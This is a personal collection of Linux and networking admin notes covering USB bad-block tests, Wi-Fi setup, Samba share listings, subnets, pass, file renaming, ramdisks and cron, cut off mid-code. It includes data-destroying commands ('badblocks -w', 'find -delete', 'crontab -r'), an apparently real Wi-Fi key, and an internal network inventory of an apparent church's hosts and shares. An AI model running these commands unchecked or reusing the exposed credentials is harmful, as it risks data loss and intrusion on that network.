To test and detect bad sector in USB flash memory or pen drive, run:
badblocks -w -s -o error.log /dev/sdX
To error-check a USB flash drive, you can use the f3write and f3read commands, which are an alternative to the h2testw app from Windows.
First, find out your USB stick or flash drive name under Linux, run:
lsblk
Warning: This will destroy any previously stored data on your USB pen/stick. Make sure you choose correct USB device name under Linux.
Once the USB pen/stick is inserted, run the following command to search the device for bad blocks:
sudo badblocks -w -s -o error.log /dev/sda
Lots of good info at, https://www.cyberciti.biz/faq/linux-check-the-physical-health-of-a-usb-stick-flash-drive/ about USB repair.
---[Connecting to WiFi from the command line]--- (top)
Make sure your WiFi interface is up:
ifconfig wlan0 up
Find the AP you want to connect to:
iwlist wlan0 scan
                    ESSID:"CCCCPublic"
                    8A:DC:96:47:D0:AE
Connect to the AP:
iwconfig wlan0 essid CCCCPublic key 's:!XD247365!'    (quoted so the shell does not expand the ! characters)
rfkill list
rfkill unblock all
iwconfig
sudo ifconfig wlan0 up
sudo iwlist wlan0 scan | grep ESSID
sudo apt install wpasupplicant    # provides wpa_passphrase
$ ip link sho
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN mode DEFAULT group default qlen 1000
    link/ether 74:86:7a:5d:35:b1 brd ff:ff:ff:ff:ff:ff
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
    link/ether fc:f8:ae:26:86:ee brd ff:ff:ff:ff:ff:ff
---[Samba]--- (top)
To mount a samba share from the command line:
$ cd ~
$ mkdir smbshare
$ sudo mount -t cifs //ipaddress/share smbshare -o user=myusername,pass=mypassword
$ sudo systemctl stop smbd
$ sudo systemctl stop nmbd
$ sudo systemctl start smbd
$ sudo systemctl start nmbd
ben@ben-b:~$ findsmb
                                *=DMB
                                +=LMB
IP ADDR         NETBIOS NAME     WORKGROUP/OS/VERSION
---------------------------------------------------------------------
10.32.10.223    BEN-B            [WORKGROUP]
ben@ben-b:~$ smbclient -L bkupsrv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\ben's password:

        Sharename       Type      Comment
        ---------       ----      -------
        bkupsrv         Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (bkupsrv server (Samba, Ubuntu))
        Brother_MFC_J497DW_Billie_s_MacBook_Pro     Printer   Brother MFC-J497DW
        HP_Officejet_5740_series_710C28_            Printer   HP_Officejet_5740_series_710C28_
        RICOH_MP_C4504ex_002673E8869C_              Printer
        HP_Officejet_Pro_8610_Billie_s_MacBook_Pro  Printer   HP Officejet Pro 8610
        HP_Officejet_5740_series_710C28_@HPA08CFD710C28.local   Printer
        Brother_PT_2730_2_MacBook_Pro_Steve_i9      Printer   Brother PT-2730-2
        Samsung_C410_Series_Streaming_MacBook       Printer   Samsung C410 Series
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        CHURCH               VOLUNTEER
        WORKGROUP            BKUPSRV
Lists Domain, OS, Server, Computers, Shares, and Workgroup
smbtree [ Lists all your machines and shares ]
hostname [ Your hostname ]
nmblookup -S WORKGROUP [ Lists Netbios, and internal IP's ]
nmblookup -T WORKGROUP [ List Netbios, and IP for any machines that are sharing services. ]
testparm -s [ Lists Server Role, Shares and their attributes, also Checks services. ]
testparm [ Same as above command, but gives you the option to display more info. ]
ben@benb:~$ smbtree
WORKGROUP
    \\VIDEOS-IMAC            Video's iMac
    \\TLANE-PC
    \\SYNOLOGYROUTER
    \\STEVENSMITH-PC
    \\STEVENS-TIME-CA        Steven's Time Capsule
        \\STEVENS-TIME-CA\IPC$
    \\RNP002673E8869C
        \\RNP002673E8869C\IPC$
        \\RNP002673E8869C\MPC4504EX
    \\OPTEC-5S9E6SIUZ
    \\MACMINI-C9CDCF         Side Screen Mac Mini
    \\MACBOOKPRO-ED70        MacBook Pro Steve i9
    \\MACBOOKPRO-22E2        Student Computer (3)
    \\MAC-MINI               Mac mini
    \\LINKSYS05546           Samba 3.0.28a
    \\LIGHTS-MAC-MINI        Lights Mac Mini
    \\LAPTOP-0JA6K8OQ
    \\DESKTOP-TC4L78D
    \\DESKTOP-SCREVEC
    \\DESKTOP-DIFC89T
    \\BENB                   benb server (Samba, Ubuntu)
        \\BENB\HP-Officejet-5740-series      HP Officejet 5740 series
        \\BENB\Ricoh-MP-C4504ex              Ricoh MP C4504ex
        \\BENB\Brother_PT_2730_2_MacBook_Pro_Steve_i9   Brother PT-2730-2
        \\BENB\RICOH_MP_C4504ex_002673E8869C_Lincoln_s_MacBook_Pro   RICOH MP C4504ex [002673E8869C]
        \\BENB\IPC$              IPC Service (Samba 4.7.6-Ubuntu)
        \\BENB\print$            Printer Drivers
CHURCH
    \\VOLUNTEER
        \\VOLUNTEER\print$       Printer Drivers
        \\VOLUNTEER\IPC$         Remote IPC
CAPCITY
    \\STAFF                  CCCC Staff Server
    \\MEDIA                  CCCC Media Server
        \\MEDIA\Users
        \\MEDIA\Media H          Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014
        \\MEDIA\Media G          Bios lists as 00:04 - in slot 5 - installed 02/23/2014
        \\MEDIA\K$               Default share
        \\MEDIA\IPC$             Remote IPC
        \\MEDIA\H$               Default share
        \\MEDIA\G$               Default share
        \\MEDIA\F$               Default share
        \\MEDIA\E$               Default share
        \\MEDIA\E
        \\MEDIA\C$               Default share
        \\MEDIA\ADMIN$           Remote Admin
    \\JON-SUTPHIN-PC
    \\BKUPSRV                bkupsrv server (Samba, Ubuntu)
        \\BKUPSRV\Brother_PT_2730_2_MacBook_Pro_Steve_i9   Brother PT-2730-2
        \\BKUPSRV\RICOH_MP_C4504ex_002673E8869C_Lincoln_s_MacBook_Pro   RICOH MP C4504ex [002673E8869C]
        \\BKUPSRV\HP_Officejet_5740_series_710C28_   HP_Officejet_5740_series_710C28_
        \\BKUPSRV\IPC$           IPC Service (bkupsrv server (Samba, Ubuntu))
        \\BKUPSRV\print$         Printer Drivers
        \\BKUPSRV\bkupsrv        Backup Server
ben@benb:~$
ben@benb:~$ smbd --version Version 4.7.6-Ubuntu
ben@ben-b:~$ systemctl status smbd nmbd
smbd.service - Samba SMB Daemon
   Loaded: loaded (/lib/systemd/system/smbd.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2020-06-10 10:29:50 EDT; 5h 13min ago
     Docs: man:smbd(8)
           man:samba(7)
           man:smb.conf(5)
 Main PID: 2092 (smbd)
   Status: "smbd: ready to serve connections..."
    Tasks: 4 (limit: 4915)
   CGroup: /system.slice/smbd.service
           ├─2092 /usr/sbin/smbd --foreground --no-process-group
           ├─2099 /usr/sbin/smbd --foreground --no-process-group
           ├─2100 /usr/sbin/smbd --foreground --no-process-group
           └─2105 /usr/sbin/smbd --foreground --no-process-group

Jun 10 10:29:44 ben-b systemd[1]: Starting Samba SMB Daemon...
Jun 10 10:29:50 ben-b systemd[1]: Started Samba SMB Daemon.
Jun 10 15:40:25 ben-b smbd[24075]: pam_unix(samba:session): session closed for user nobody
Jun 10 15:40:25 ben-b smbd[24074]: pam_unix(samba:session): session closed for user nobody

nmbd.service - Samba NMB Daemon
   Loaded: loaded (/lib/systemd/system/nmbd.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2020-06-10 10:29:44 EDT; 5h 13min ago
     Docs: man:nmbd(8)
           man:samba(7)
           man:smb.conf(5)
 Main PID: 1551 (nmbd)
   Status: "nmbd: ready to serve connections..."
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/nmbd.service
           └─1551 /usr/sbin/nmbd --foreground --no-process-group
ben@benb:~$ smbclient -L staffsrv
Connection to staffsrv failed (Error NT_STATUS_UNSUCCESSFUL)
ben@benb:~$ smbtree
WORKGROUP
    \\VIDEOS-IMAC            Video's iMac
    \\STEVENSMITH-PC
    \\STEVENS-TIME-CA        Steven's Time Capsule
        \\STEVENS-TIME-CA\IPC$
    \\RNP002673E8869C
        \\RNP002673E8869C\IPC$
        \\RNP002673E8869C\MPC4504EX
    \\OPTEC-5S9E6SIUZ
    \\LYRICS-MAC-MINI        Lyrics Mac Mini
    \\LINKSYS05546           Samba 3.0.28a
    \\LIGHTS-MAC-MINI        Lights Mac Mini
CAPCITY
    \\STAFF                  CCCC Staff Server
    \\MEDIA                  CCCC Media Server
        \\MEDIA\Users
        \\MEDIA\Media H          Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014
        \\MEDIA\Media G          Bios lists as 00:04 - in slot 5 - installed 02/23/2014
        \\MEDIA\K$               Default share
        \\MEDIA\IPC$             Remote IPC
        \\MEDIA\H$               Default share
        \\MEDIA\G$               Default share
        \\MEDIA\F$               Default share
        \\MEDIA\E$               Default share
        \\MEDIA\E
        \\MEDIA\C$               Default share
        \\MEDIA\ADMIN$           Remote Admin
    \\JON-SUTPHIN-PC
    \\BKUPSRV                bkupsrv server (Samba, Ubuntu)
        \\BKUPSRV\HP_Officejet_Pro_8610_Billie_s_MacBook_Pro   HP Officejet Pro 8610
        \\BKUPSRV\HP_Officejet_5740_series_710C28_             HP_Officejet_5740_series_710C28_
        \\BKUPSRV\Brother_MFC_J497DW_Billie_s_MacBook_Pro      Brother MFC-J497DW
        \\BKUPSRV\IPC$           IPC Service (bkupsrv server (Samba, Ubuntu))
        \\BKUPSRV\print$         Printer Drivers
        \\BKUPSRV\bkupsrv        Backup Server
    \\BENB                   Samba 4.7.6-Ubuntu
        \\BENB\HP-Officejet-5740-series      HP Officejet 5740 series
        \\BENB\Ricoh-MP-C4504ex              Ricoh MP C4504ex
        \\BENB\RICOH_MP_C4504ex_002673E8869C_   RICOH_MP_C4504ex_002673E8869C_
        \\BENB\IPC$              IPC Service (Samba 4.7.6-Ubuntu)
        \\BENB\print$            Printer Drivers
ben@benb:~$
C:\> net use \\samba-server-ip\share-name /delete
C:\> net use \\10.32.10.155\bkupsrv /delete
$ sudo umount /media/ben/bkupsrv
Ref: https://www.linuxbabe.com/ubuntu/install-samba-server-file-share
---[multi-subnets]--- (top)
Having more than one subnet on a LAN used to be more common than it is today. You can configure the router interface with a secondary* address. This will allow the router to be the gateway for both subnets, and it will be able to route between them.
*You can have more than just two subnets on a LAN. Cisco refers to them all as secondary addresses, although technically they should be called tertiary, quaternary, etc.
The subnet (address plus mask) determines which hosts are "assumed to be on link". If a host wants to communicate with a host outside its subnet, then (assuming there is nothing special in the host's routing table) it will send the packet to its default gateway.
If the default gateway knows about all the subnets and is prepared to send packets back out on the same interface they came in through then communication will work fine. Otherwise things are going to break.
When the default gateway notices that it is sending a packet back out the way it came in it may send ICMP redirect packets to inform the host that it can send the packet by a more direct route. The sending host may or may not take notice of said redirect.
Two different subnets are two separate broadcast domains. The only device that can traverse multiple broadcast domains is a L3-aware device (router, firewall, multilayer switch etc.).
https://blog.biamp.com/the-difference-between-vlans-and-subnets/
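As an added illustration (mine, not part of these notes or the references above), the following Python models the two decisions described: a host checks whether a destination is inside its own subnet (on-link) or must go to the default gateway, and a router carrying a primary plus a secondary address on one interface checks whether the packet would leave by the interface it arrived on, which is the situation in which it may send an ICMP redirect. The interface names and addresses are constructed sample values.

```python
"""Model the on-link vs. default-gateway decision for hosts on a multi-subnet LAN."""
import ipaddress


def next_hop(host_iface, dst, default_gateway):
    """Decide where a host sends a packet for dst.

    host_iface is the host's address in 'ip/prefix' form. A destination inside
    that prefix is assumed to be on link and is sent to directly; anything else
    goes to the default gateway (ignoring any special host routes)."""
    net = ipaddress.ip_interface(host_iface).network
    dst_ip = ipaddress.ip_address(dst)
    if dst_ip in net:
        return ("on-link", str(dst_ip))
    return ("gateway", default_gateway)


def router_forwards(router_ifaces, ingress, dst):
    """Decide which interface a router sends dst out of.

    router_ifaces maps an interface name to its list of 'ip/prefix' addresses
    (primary plus any secondary addresses). Returns (egress_iface, hairpin) where
    hairpin is True when the packet leaves by the interface it arrived on; that
    is the case in which a router may emit an ICMP redirect. (None, False) means
    no connected route matched."""
    dst_ip = ipaddress.ip_address(dst)
    for name, addrs in router_ifaces.items():
        for addr in addrs:
            if dst_ip in ipaddress.ip_interface(addr).network:
                return (name, name == ingress)
    return (None, False)


# Constructed sample topology: one router interface carrying two subnets
# (a "secondary address" in Cisco terms) and a second interface on its own subnet.
ROUTER = {
    "eth0": ["10.32.10.1/24", "10.32.20.1/24"],
    "eth1": ["192.168.1.1/24"],
}


def trace(host_iface, dst, gateway="10.32.10.1", router=ROUTER):
    """Follow one packet from a host on eth0 through the router; returns the steps taken."""
    steps = []
    kind, target = next_hop(host_iface, dst, gateway)
    steps.append(f"host: {dst} is {kind} -> {target}")
    if kind == "gateway":
        egress, hairpin = router_forwards(router, "eth0", dst)
        if egress is None:
            steps.append("router: no connected route (would use its own default route)")
        else:
            steps.append(f"router: forward out {egress}"
                         + (" (same interface: ICMP redirect possible)" if hairpin else ""))
    return steps


if __name__ == "__main__":
    for dst in ("10.32.10.9", "10.32.20.7", "192.168.1.50", "8.8.8.8"):
        print("\n".join(trace("10.32.10.5/24", dst)))
```

Running it shows that traffic between the two subnets on eth0 hairpins through the router, which is exactly the case where an ICMP redirect may appear in a capture and where a firewall that refuses to forward out the ingress interface will silently break the LAN.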
---[Wireshark Expressions for Dante]--- (top)
igmp && ip.addr == xxx.xxx.xxx.xxx
(Wireshark display filter: the address field is ip.addr; replace the x's with the host you want to filter on.)
Verifying networked audio (Q-SYS / Dante) with Wireshark?

Hi all, I'm not new to Q-SYS or Dante. I'm familiar with configuring switches and such. I do need to wrap my head around a few things. I'm mainly looking for pointers to verifying switch configuration when I'm relying on client IT folks to configure their switches for Q-LAN. If I capture data with Wireshark out of a Q-SYS core directly, I get flooded with PTPv2. This makes sense to me. If I plug my laptop and core into a switch, should I see the same PTPv2 data on Wireshark? If I don't, is that an indication that unregistered multicast is blocked? Should Q-LAN audio work if I don't see PTP? Next, how can I verify the DSCP priorities are configured properly in a switch by looking at packets in Wireshark. I know how to get a column for DSCP, but most packets just show "default". Thanks all!

If you have set up your igmp querier and snooping correctly you can filter in wire shark by using simply “igmp” as the filter (no quotes). You should see membership reports and leave groups on the laptop as it is plugged into the switch. Same with ip video encoders/decoders. You can drill deeper by using the filter “igmp&&ipaddr==xxx.xxx.xxx.xxx” again no quotes and replace the x’s with the IP address you wish to filter. Every layer3 switch I’ve configured also has an igmp table that should list all the devices found by the querier/snooping in one list so you can see if your devices are connected. Keep in mind if you are using vlans to make sure igmp snooping and queries are setup for that particular vlan as well as the default vlan.

Edit to add. For QoS DSCP values QSC has pretty detailed setup guides for a large selection of switches on their website. Do a google search for qsc qualified switches and you can access the guides there. In some cases there are very specific QoS instructions for when qlan and Dante exist on the same network. There are even settings within the core for packet prioritizing dante and qlan when residing on the same network. I’ve asked about how they go about determining the right values and haven’t received a solid answer other than Marko is the person who does a lot of the QoS details. Marko Fred and cookie are the three guys there that really know the ins and outs of that side of it. Give them a call if you want to get specifics though they are harder and harder to reach these days as Q-Sys popularity gains speed.

About the QoS values when doing mixed Dante/qsys network: Audinate has locked the DSCP values for Ptp, audio and discovery. Qsc recently allowed these to be changed in order to comply with larger setups. This solves situations where qlan and Dante vlans need to share the same trunk ports. Dante DSCP values can be found by googling. Correct QoS settings on a switch are very hard to measure (unless you have access to switch config and can take a look). Incorrect settings will manifest as problem with lots of traffic and/or mixed gigabit and 100mb ports.

https://www.reddit.com/r/CommercialAV/comments/8rg0lq/verifying_networked_audio_qsys_dante_with/
---[Kazam Screen Recording]--- (top)
To install kazam:
sudo add-apt-repository ppa:sylvain-pineau/kazam
sudo apt-get update
sudo apt install kazam
---[pass]--- (top)
Setting up GNUPG based pass system
gpg --list-keys
/home/ben/.gnupg/pubring.kbx
----------------------------
pub   rsa3072 2020-12-03 [SC]
      96606AD4E8214AF6EE20F84805AE85193A16AC7B
uid           [ultimate] William Ben Bellamy Jr
sub   rsa3072 2020-12-03 [E]
sub   rsa4096 2020-12-03 [E]

Then run this command to initialise a password store encrypted to the GPG key listed above:
pass init 96606AD4E8214AF6EE20F84805AE85193A16AC7B
One approach is to use the multi-line functionality of pass (--multiline or -m in insert), and store the password itself on the first line of the file, and the additional information on subsequent lines. For example, Amazon/bookreader might look like this:
Yw|ZSNH!}z"6{ym9pI
URL: *.amazon.com/*
Username: AmazonianChicken@example.com
Secret Question 1: What is your childhood best friend's most bizarre superhero fantasy? Oh god, Amazon, it's too awful to say...
Phone Support PIN #: 84719
Another approach is to use folders, and store each piece of data inside a file in that folder. For example Amazon/bookreader/password would hold bookreader's password inside the Amazon/bookreader directory, and Amazon/bookreader/secretquestion1 would hold a secret question, and Amazon/bookreader/sensitivecode would hold something else related to bookreader's account. And yet another approach might be to store the password in Amazon/bookreader and the additional data in Amazon/bookreader.meta. And even another approach might be use multiline, as outlined above, but put the URL template in the filename instead of inside the file.
Insert a new password record
$ pass insert archlinux.org/wiki/username
We’ll insert an existing password of ours with pass insert, giving it a descriptive hierarchical name:
$ pass insert google.com/gmail/example@gmail.com
mkdir: created directory ‘/home/tom/.password-store/google.com’
mkdir: created directory ‘/home/tom/.password-store/google.com/gmail’
Enter password for google.com/gmail/example@gmail.com:
Retype password for google.com/gmail/example@gmail.com:
To get a view of the password store do the following. Note the example output, which shows the hierarchy we just created.
$ pass
To generate a new random password for the above example, do the following, where n is the desired password length as a number:
$ pass generate archlinux.org/wiki/username n
To retrieve a password, enter the gpg passphrase at the following prompt, again using the example name from above:
$ pass archlinux.org/wiki/username
You can edit an existing file the way you want with command pass edit password_name.
If you’d like it to generate a new secure random password for you, you can use generate instead, including a password length as the last argument:
$ pass generate google.com/gmail/example@gmail.com 16
The generated password to google.com/gmail/example@gmail.com is:
!Q%i$$&q1+JJi-|X
If we need to change an existing password, we can either overwrite it with insert again, or use the edit operation to invoke our choice of $EDITOR:
$ pass edit google.com/gmail/example@gmail.com
This password can now be retrieved and echoed onto the command line given the appropriate passphrase:
$ pass google.com/gmail/example@gmail.com
(...gpg-agent pinentry prompt...)
Tr0ub4dor&3
If you would like it copied to your clipboard automatically you can use the -c flag:
$ pass -c test
If we no longer need the password, we can remove it with pass rm:
$ pass rm google.com/gmail/example@gmail.com
Are you sure you would like to delete google.com/gmail/example@gmail.com? [y/N] y
removed ‘/home/tom/.password-store/google.com/gmail/example@gmail.com.gpg’
We can delete whole directories of passwords with pass rm -r:
$ pass rm -r google.com
Are you sure you would like to delete google.com? [y/N] y
removed ‘/home/tom/.password-store/google.com/gmail/example@gmail.com.gpg’
removed directory: ‘/home/tom/.password-store/google.com/gmail’
removed directory: ‘/home/tom/.password-store/google.com’
Because the password files are all encrypted only to your GnuPG key, you can relatively safely back up the store on remote and third-party sites simply by copying the ~/.password-store directory. If the filenames themselves contain sensitive information, such as private usernames or sites, you might like to back up an encrypted tarball of the store instead:
$ tar -cz .password-store \
    | gpg --sign --encrypt -r 0x77BB8872 \
    > password-store-backup.tar.gz.gpg
This directory can be restored in a similar way:
$ gpg --decrypt \
    < password-store-backup.tar.gz.gpg \
    | tar -xz
---[namei]--- (top)
On some systems, the utility namei can be used to help find permissions problems by listing the permissions along each component of the path. In the output below, test.pl grants nothing to "other", so a web server account that is neither the owner nor in the file's group cannot read or execute it:
$ namei -m /var/www/html/cgi-bin/test.pl
f: /var/www/html/cgi-bin/test.pl
 drwxr-xr-x /
 drwxr-xr-x var
 drwxr-xr-x www
 drwxr-xr-x html
 drwxr-xr-x cgi-bin
 -rwxrwx--- test.pl
---[Renaming files/folders en mass]--- (top)
Renaming files/folders with trailing spaces so that Linux cp works properly.

This will rename all files, changing every space to an underscore:
rename 's/ /_/g' *

The -n (dry-run) shows what would happen. Remove the -n to actually make the rename changes. This one strips trailing spaces:
rename -n 's/ *$//' *

To find files or folders that are empty (recursively):
find . -empty

Satisfied with that test, let the action take place:
find . -empty -delete

Also use -type f for only files and -type d for only directories if you want.

for f in *; do mv -- "$f" "$(echo "$f" | tr ' ' '_')"; done

This is the original example:
for file in *.doc *.mp3 *.wav *.txt
do
    mv -- "$file" "${file// /_}"
done

# This will identify files that end with a space:
for file in *' '
do
    ls -- "$file"
done

# This will rename each file so that the single trailing space is changed to an underscore:
for file in *' '
do
    mv -- "$file" "${file% }_"
done

# This will rename each file so that the single trailing underscore is removed:
for file in *'_'
do
    mv -- "$file" "${file%_}"
done
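An added Python version of the same cleanup (mine, not from the reference the shell loops came from): it plans the renames bottom-up with os.walk so that a directory's contents are renamed before the directory itself, runs as a dry run by default, and refuses to overwrite an existing name. The sample directory tree is constructed by build_sample_tree purely for demonstration.

```python
"""Rename files and directories whose names carry trailing or embedded spaces."""
import os
import tempfile


def normalize_name(name):
    """Strip trailing spaces, then turn any remaining spaces into underscores."""
    return name.rstrip(" ").replace(" ", "_")


def plan_renames(root):
    """Return [(old_path, new_path)] for every entry under root that needs renaming.
    os.walk(topdown=False) lists deeper directories first, so a directory's
    contents are renamed before the directory itself and no old path goes stale."""
    plan = []
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in dirnames + filenames:
            new = normalize_name(name)
            if new != name:
                plan.append((os.path.join(dirpath, name), os.path.join(dirpath, new)))
    return plan


def apply_renames(plan, dry_run=True):
    """Carry out (or, with dry_run, merely report) the planned renames.
    Never overwrites: an existing target is reported and skipped."""
    done = []
    for old, new in plan:
        if os.path.lexists(new):
            print(f"skip: {new!r} already exists")
            continue
        if not dry_run:
            os.rename(old, new)
        done.append((old, new))
    return done


def list_tree(root):
    """Relative paths of every file under root, for before/after comparison."""
    paths = []
    for dirpath, _, filenames in os.walk(root):
        for f in filenames:
            rel = os.path.relpath(os.path.join(dirpath, f), root)
            paths.append(rel.replace(os.sep, "/"))
    return sorted(paths)


def build_sample_tree():
    """Constructed sample data: a temp directory with the kind of names that break cp."""
    root = tempfile.mkdtemp(prefix="rename-demo-")
    os.makedirs(os.path.join(root, "sub dir ", "x"))
    for name in ("report 2020 ", "clean.txt"):
        open(os.path.join(root, "sub dir ", "x", name), "w").close()
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("before:", list_tree(root))
    for old, new in apply_renames(plan_renames(root), dry_run=True):
        print(f"would rename {old!r} -> {new!r}")
    apply_renames(plan_renames(root), dry_run=False)
    print("after:", list_tree(root))
```

Names containing a newline are handled correctly here because os.walk returns them as Python strings; the shell one-liners above would split such names. A dry run cannot see collisions between two planned renames that map to the same new name, so the real run re-checks with os.path.lexists before each mv.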
---[Typing Unicode]--- (top)
In xfce, press and hold Ctrl+Shift+U, then release. Next type the hex code/value for the character you want entered, then press Enter and the Unicode character will be displayed on the shell command line.
Type Ctrl+U to drop out of unicode typing.
https://en.wikipedia.org/wiki/Unicode_input
P Ɉ Ⴒ ᵱ L ƪ ɭ U ʊ Կ ᶙ G ǥ ᦋ
'HaShem Nnarana7h@ ' 'HaShem^Nnaran@7ha ' 'HaShem Nn@rana7ha^' 'HaShem Nnarana7h@^' 'HaShem Nnaran@7ha^' HaShem Nnaran@7ha^Ϯ HaShem Nnaran@7ha^[space][Ctrl+Shift+u]03ee[Ctrl+u][enter] 'HaShem @d0nai^' 'HaShem🙏Adonai^ ' 'HaShenn🙏Adonai^ ' 'HaShenn🙏Adonai^ ' HaShenn [Ctrl+Shift+u]03ee[Ctrl+u]Adonai^ ' 🙏 U+1F64F 🙌 U+1F64C ♱ U+2670 ♰ U+2671 ✞ U+271e 🕆 U+1F546 🕇 U+1F547 🕈 U+1F548 Ϯ 03ee ϯ 03ef
---[Ramdisk & Swap]--- (top)
Create a mount point
sudo mkdir /mnt/ramdisk
Mount the ramdisk
mount -t tmpfs -o size=1024m tmpfs /mnt/ramdisk
Edit the /etc/fstab file to make this ramdisk persistent across reboots (though its contents will be lost every reboot).
Add this line to /etc/fstab
tmpfs /mnt/ramdisk tmpfs nodev,nosuid,noexec,nodiratime,size=1024M 0 0
To see which swap space is active on your UNIX/Linux system run the following command in a terminal:
root@ben-b:/mnt/ramdisk# /sbin/swapon -s
Filename                                Type            Size    Used    Priority
/dev/dm-2                               partition       999420  1076    -2
Also,
root@ben-b:/mnt/ramdisk# /sbin/swapon --show=NAME,TYPE,SIZE,USED,PRIO
NAME      TYPE      SIZE USED PRIO
/dev/dm-2 partition 976M 1.1M   -2
As a general rule, the recommended size of the swap space is twice the amount of physical memory the system has. Keep this in mind for general-purpose setups and desktop machines.
This is an example of creating a swap file, rather than a ramdisk. As an example, we create a file named /swapfile with a size of 512M and enable it as additional swap space. Make the file readable only by root (chmod 600 /swapfile) before enabling it: swapon warns about a world-readable swap file, and swap can hold secrets paged out of memory.
# dd if=/dev/zero of=/swapfile bs=1024 count=524288
524288+0 datasets in
524288+0 datasets out
536870912 bytes (537 MB) copied, 0,887744 s, 605 MB/s
# mkswap /swapfile
Setting up swapspace version 1, size = 524284 KiB
no label, UUID=e47ab7fe-5efc-4175-b287-d0e83bc10f2e
# swapon /swapfile
# swapon --show=NAME,TYPE,SIZE,USED,PRIO
NAME      TYPE       SIZE   USED PRIO
/dev/dm-3 partition 15,4G 288,9M   -1
/swapfile file       512M     0B   -2
#
Last but not least, there is one command to disable the swap file again. The command is called swapoff. It requires a single parameter that indicates the swap device to be disabled. This command disables the previously activated swap file:
# swapoff /swapfile
There is more on this reference page that I need to go through and flesh out.
And this might be a better reference, specifically for a ramdisk.
https://linuxhint.com/ramdisk_ubuntu_1804/
Ref: https://www.jamescoyle.net/how-to/943-create-a-ram-disk-in-linux
---[cron]--- (top)
The crontab -e command is used to edit a cron file.
Using the crontab command not only allows you to edit the command, it also restarts the crond daemon when you save and exit the editor.
# crontab -e
SHELL=/bin/bash
MAILTO=root@example.com
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed

* * * * * command to be executed
- - - - -
| | | | |
| | | | ----- Day of week (0 - 7) (Sunday=0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

By default the output of a command or a script (if any is produced) will be emailed to your local email account. To stop receiving email output from crontab you need to append >/dev/null 2>&1. For example:
0 3 * * * /root/backup.sh >/dev/null 2>&1
To mail output to particular email account let us say vivek@nixcraft.in you need to define MAILTO variable as follows:
MAILTO="vivek@nixcraft.in"
0 3 * * * /root/backup.sh >/dev/null 2>&1
List all cron jobs
# crontab -l
To remove or erase all crontab jobs use the following command:
# Delete the current cron jobs
# crontab -r
Instead of the first five fields, you can use any one of eight special strings. This not only saves time but also improves readability.
Special string   Meaning
@reboot          Run once, at startup.
@yearly          Run once a year, "0 0 1 1 *".
@annually        (same as @yearly)
@monthly         Run once a month, "0 0 1 * *".
@weekly          Run once a week, "0 0 * * 0".
@daily           Run once a day, "0 0 * * *".
@midnight        (same as @daily)
@hourly          Run once an hour, "0 * * * *".
Run ntpdate command every hour:
@hourly /path/to/ntpdate
Make a backup everyday:
@daily /path/to/backup/scri
/etc/crontab is the system crontab file. It is usually only used by the root user or daemons to configure system-wide jobs. Individual users must use the crontab command to install and edit their jobs as described above. /var/spool/cron/ or /var/cron/tabs/ is the directory for personal user crontab files; it must be backed up along with the users' home directories.
Typical /etc/crontab file entries:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
First, the environment must be defined. If the SHELL line is omitted, cron will use the default, which is sh. If the PATH variable is omitted, no default will be used and file locations will need to be absolute. If HOME is omitted, cron will use the invoking user's home directory.
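As an added example (mine, not from the cyberciti reference), a small Python parser for the crontab time fields described in this section: it expands '*', ranges, lists and '/step' values, accepts month and weekday names, maps the @-strings from the table to their five-field equivalents, handles the extra user field of /etc/crontab, and reports whether a schedule fires at a given moment. It applies cron's rule that when both the day-of-month and day-of-week fields are restricted the job runs when either one matches. The crontab lines it is exercised with are the ones shown above.

```python
"""Parse crontab time fields and check whether a job fires at a given moment."""
import datetime
from dataclasses import dataclass
from typing import Optional

# Special strings from the table above; @reboot has no time fields.
SPECIAL = {
    "@yearly": "0 0 1 1 *", "@annually": "0 0 1 1 *", "@monthly": "0 0 1 * *",
    "@weekly": "0 0 * * 0", "@daily": "0 0 * * *", "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *",
}
MONTHS = {m: i + 1 for i, m in enumerate(
    "jan feb mar apr may jun jul aug sep oct nov dec".split())}
WEEKDAYS = {d: i for i, d in enumerate("sun mon tue wed thu fri sat".split())}
# (low, high, name table) for minute, hour, day of month, month, day of week
FIELDS = [(0, 59, None), (0, 23, None), (1, 31, None), (1, 12, MONTHS), (0, 7, WEEKDAYS)]


def _value(token, names):
    if names and token.lower() in names:
        return names[token.lower()]
    return int(token)


def expand_field(spec, lo, hi, names=None):
    """Expand one field ('*', '5', '1-5', '*/15', 'mon,wed', '3/7') into a set of ints."""
    values = set()
    for part in spec.split(","):
        step, stepped = 1, "/" in part
        if stepped:
            part, step_txt = part.split("/", 1)
            step = int(step_txt)
            if step < 1:
                raise ValueError(f"bad step in {spec!r}")
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
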